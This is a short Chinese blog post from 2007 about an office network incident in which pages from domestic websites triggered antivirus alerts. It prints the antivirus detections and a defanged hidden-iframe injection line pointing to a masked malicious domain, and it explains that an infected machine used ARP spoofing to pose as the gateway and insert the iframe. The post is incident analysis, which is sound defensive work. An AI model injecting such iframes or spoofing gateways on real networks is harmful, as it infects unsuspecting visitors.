endurer 原创
2007-05-16 第1版
今天上午,我们单位里的电脑,打开国内网站的网页都报病毒
卡巴都报:
/---
已检测到: 恶意程序 Exploit.Win32.IMG-ANI.gen (修改) URL: hxxp://q***.z*px**5**2*0.com/w***.js
---/
瑞星都报发现:Trojan.DL.VBS.Agent.cog、Hack.SuspiciousAni。
检查这些被报含病毒的网页的源代码,发现头部都被加入了代码:
/---
<iframe src='hxxp://www.z*px**5**2*0.com/0***.htm' width=0 height=0></iframe>
---/
比国宝自动在网页加代码还利害……
奇怪的是,打开Google等国外的网站就没事……查看这些国外网站的网页的源代码,没有被加入恶意代码……
难道这病毒还“吃里巴外”?
中午认真排查,发现一根网线,一接到交换机上就出现上述问题,此时网关可以正常Ping通;把这根网线拔掉,网关就Ping不通了,需要重启交换机等设备才能恢复正常。
看来这个病毒发作时,使用ARP欺骗技术,把自身所在的电脑伪装为网关,这样局域网中其它电脑与外网的数据交换都要经过它,病毒就可以往网页数据里加入包含恶意网址代码了。